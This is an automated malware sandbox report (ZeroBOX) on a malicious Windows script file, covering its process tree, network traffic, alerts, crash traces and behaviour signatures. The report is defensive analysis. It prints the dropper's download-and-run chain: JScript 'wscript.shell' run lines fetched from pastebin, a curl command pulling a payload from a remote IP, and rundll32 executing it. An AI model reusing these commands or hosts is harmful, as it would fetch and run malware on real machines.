Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 19, 2023, 8:59 a.m.	April 19, 2023, 9:01 a.m.

Size	73.1KB
Type	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5	`dc0ded1a1a05a26960a9adbf3cc5e5cb`
SHA256	`f6003d3caef914e6631d1bee88790711b32a8503d763af909efcf4edf2516f77`
CRC32	`1912B550`
ssdeep	`1536:KWjV5HcO+sdf2lKwbX5TcVvQaTDBgZkR4P8CmyeKDK:KWoOzdf2lKwb5AVjFCmKDK`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Funds_366728.wsf
1000
- curl.exe "C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj9.dat
  2144
- rundll32.exe "C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
  2580

Name	Response	Post-Analysis Lookup
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	172.67.34.170

IP Address	Status	Action
104.20.68.143	Active	Moloch
164.124.101.2	Active	Moloch
216.120.201.169	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49161 -> 104.20.68.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49161 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ April 19, 2023, 8:59 a.m.	stacktrace: GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18 MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x73fe77b7 MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15 MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57 rundll32+0x393f @ 0x5393f rundll32+0x247a @ 0x5247a rundll32+0x1baf @ 0x51baf rundll32+0x12e8 @ 0x512e8 rundll32+0x1901 @ 0x51901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x746b3f46 registers.esp: 913292 registers.edi: 0 registers.eax: 1953185606 registers.ebp: 913332 registers.edx: 0 registers.ebx: 0 registers.esi: 1953185606 registers.ecx: 8719720	1
__exception__ April 19, 2023, 8:59 a.m.	stacktrace: GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18 MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x73fe77b7 MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15 MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57 rundll32+0x393f @ 0x5393f rundll32+0x247a @ 0x5247a rundll32+0x1baf @ 0x51baf rundll32+0x12e8 @ 0x512e8 rundll32+0x1901 @ 0x51901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x746b3f46 registers.esp: 913292 registers.edi: 0 registers.eax: 1953185606 registers.ebp: 913332 registers.edx: 0 registers.ebx: 0 registers.esi: 1953185606 registers.ecx: 8719720	1
__exception__ April 19, 2023, 8:59 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25 rundll32+0x135c @ 0x5135c rundll32+0x1901 @ 0x51901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x750d3ef4 registers.esp: 915936 registers.edi: 0 registers.eax: 42606856 registers.ebp: 915964 registers.edx: 1 registers.ebx: 0 registers.esi: 6364712 registers.ecx: 1953052028	1

Time & API

Arguments

Status

Return

Repeated

__exception__

April 19, 2023, 8:59 a.m.

stacktrace:

GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x73fe77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
rundll32+0x393f @ 0x5393f
rundll32+0x247a @ 0x5247a
rundll32+0x1baf @ 0x51baf
rundll32+0x12e8 @ 0x512e8
rundll32+0x1901 @ 0x51901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x746b3f46
registers.esp: 913292
registers.edi: 0
registers.eax: 1953185606
registers.ebp: 913332
registers.edx: 0
registers.ebx: 0
registers.esi: 1953185606
registers.ecx: 8719720

__exception__

April 19, 2023, 8:59 a.m.

stacktrace:

GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x73fe77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
rundll32+0x393f @ 0x5393f
rundll32+0x247a @ 0x5247a
rundll32+0x1baf @ 0x51baf
rundll32+0x12e8 @ 0x512e8
rundll32+0x1901 @ 0x51901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

__exception__

April 19, 2023, 8:59 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25
rundll32+0x135c @ 0x5135c
rundll32+0x1901 @ 0x51901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x750d3ef4
registers.esp: 915936
registers.edi: 0
registers.eax: 42606856
registers.ebp: 915964
registers.edx: 1
registers.ebx: 0
registers.esi: 6364712
registers.ecx: 1953052028

Performs some HTTP requests (2 events)

request	GET https://pastebin.com/raw/zD5ag0UX
request	GET https://pastebin.com/raw/mJfkXNYx

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 19, 2023, 8:59 a.m.	process_identifier: 2580 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74661000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

216.120.201.169

Wscript.exe initiated network communications indicative of a script based payload download (8 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/zD5ag0UX	1	13369356
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
InternetReadFile April 19, 2023, 8:59 a.m.	buffer: new ActiveXObject('wscript.shell').run('curl.exe --output c:\\programdata\\index.html --url ' + url, 6); request_handle: 0x00cc000c	1	1
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/mJfkXNYx	1	13369356
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
InternetReadFile April 19, 2023, 8:59 a.m.	buffer: new ActiveXObject('wscript.shell').run('rundll32 c:\\programdata\\index.html,Motd'); request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (2 events)

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (15 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/zD5ag0UX	1	13369356
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 840 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: okd?.ÔLpÑØYRFm¨:o÷é¼Ü'_¯H/5 ÀÀÀ À 28*ÿpastebin.com socket: 948 sent: 116	1	116
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 840 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: FBA>7áò ]§{_Ý!ßn ²îLù`=ºA2ì&ÎÛH+L_M©Þ7Scq+Y °¹j»WÆ0Hÿèòa £¯¥ÄêÌo`}ªèÕí¯$0`ßñ°VJrçyC^-ä®/B socket: 948 sent: 134	1	134
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 840 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: PF®ÒÐ?&T¹¸^Oqd2Iít7RNóu÷êP± æñ ¶N±%J.'³f g\#¹ ³õ-V[Pg[ 9È£lwÿpáOêêÆ½y7x.8þ=ú,t3ùr!@QôsÂ±p¡ØË³Az¾ªeá4@t¨ÃðÜën°IäÇeÚ}X§¨"ÑãÙ(»ÆûúÿÔÄP5U:Û®¤~maÌÚlÆÂ«s·ðÈ¶Õ/EñªNzOºµ{!yØñ#DÛj¤ßÿ×!«<äaèÇJ¿«Eújðú[c~fÔ[BHãâ÷¹ <nªÐÍDÝA ñ8£çÇÁr5÷·VFTßK O¶÷¼kÛß°9áÜk¾]fññðHè¯ CÀ¥èÎ½Kð) socket: 948 sent: 341	1	341
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 840 sent: 1	1	1
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/mJfkXNYx	1	13369356
send April 19, 2023, 8:59 a.m.	buffer: P¾ì>®·'DÜ`»5Ä/ø&"rú0v=mu\|k8ª©Çª$QL«äÞÜïÛû G,ò` 5vq$HLý÷êlÍ9eû¡LIF2ÄÃø¤#Ð,Ò¦ËDgyø62¼ÞJØÑûá1µ§}g£oîÐmÎÄG+´å"æ¯ &XhÍÊØÁ6(QWÐ}Ú+Ù6dÕQ!¯ûúý<VN'c^Z©¢¥éî¿ÜdË,óy¥ëÎñ²É ¶å1Æ îtå\|ñJVélôÝëÂÏlvã(p=Ä%¸yXÜ·YHO©ºè¬$hÞÖýÑýÞ¾&ø&xº¨;æök·÷°Ùâº{`>¨¹U®³ú6*4¼.Àt¨çÍnÄ¨xVOµoXc½ RSI$» socket: 948 sent: 341	1	341
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 840 sent: 1	1	1
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj9.dat
parent_process	wscript.exe	martian_process	rundll32 c:\programdata\index.html,Motd
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
parent_process	wscript.exe	martian_process	curl.exe --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj9.dat

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

216.120.201.169:80

A potential heapspray has been detected. 3579 megabytes was sprayed onto the heap of the wscript.exe process (16 events)

count

6682

name

heapspray

process

wscript.exe

total_mb

469

length

73728

protection

PAGE_READWRITE

count

2228

name

heapspray

process

wscript.exe

total_mb

208

length

98304

protection

PAGE_READWRITE

count

20060

name

heapspray

process

wscript.exe

total_mb

235

length

12288

protection

PAGE_READWRITE

count

2232

name

heapspray

process

wscript.exe

total_mb

length

36864

protection

PAGE_READWRITE

count

17850

name

heapspray

process

wscript.exe

total_mb

length

4096

protection

PAGE_READWRITE

count

4463

name

heapspray

process

wscript.exe

total_mb

length

16384

protection

PAGE_READWRITE

count

4456

name

heapspray

process

wscript.exe

total_mb

261

length

61440

protection

PAGE_READWRITE

count

4454

name

heapspray

process

wscript.exe

total_mb

434

length

102400

protection

PAGE_READWRITE

count

6683

name

heapspray

process

wscript.exe

total_mb

365

length

57344

protection

PAGE_READWRITE

count

13381

name

heapspray

process

wscript.exe

total_mb

104

length

8192

protection

PAGE_READWRITE

count

2229

name

heapspray

process

wscript.exe

total_mb

174

length

81920

protection

PAGE_READWRITE

count

13367

name

heapspray

process

wscript.exe

total_mb

365

length

28672

protection

PAGE_READWRITE

count

6681

name

heapspray

process

wscript.exe

total_mb

287

length

45056

protection

PAGE_READWRITE

count

2229

name

heapspray

process

wscript.exe

total_mb

length

24576

protection

PAGE_READWRITE

count

13372

name

heapspray

process

wscript.exe

total_mb

261

length

20480

protection

PAGE_READWRITE

count

2229

name

heapspray

process

wscript.exe

total_mb

148

length

69632

protection

PAGE_READWRITE

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\util\curl\curl.exe
file	C:\Windows\System32\rundll32.exe

Funds_366728.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All